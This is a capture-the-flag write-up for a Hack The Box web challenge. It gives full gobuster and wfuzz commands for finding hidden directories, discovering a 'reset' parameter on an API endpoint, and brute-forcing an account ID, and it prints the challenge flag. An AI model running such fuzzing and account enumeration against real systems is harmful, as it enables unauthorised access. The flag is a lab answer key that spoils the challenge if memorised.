Challenge By : Arrexel
Challenge Description : We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.
Points : 20
Author : Rehman S. Beg (HTB Profile : MrReh )
________________________________________
Lets Start the instance and open the page, its looks like normal web page
Lets Start with gobuster command “gobuster dir -u http://docker.hackthebox.eu:30716/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50”
“api” interesting directory lets gobuster to find some extensions
we found action.php lets see what we have on this
So we need to find what parameters there is to set and what value we can put in.
To find we can use Wfuzz command “wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30713/api/action.php?FUZZ=test”
Now we have found our parameter which is “reset” lets see what this parameter gives us
Now we have to bruteforce the Account Id
Again we will use Wfuzz but for this time we will set chars lenght 27 command “wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:30713/api/action.php?reset=FUZZ”
So we got the account ID lets browse it
FLAG : “HTB{h0t_fuzz3r}”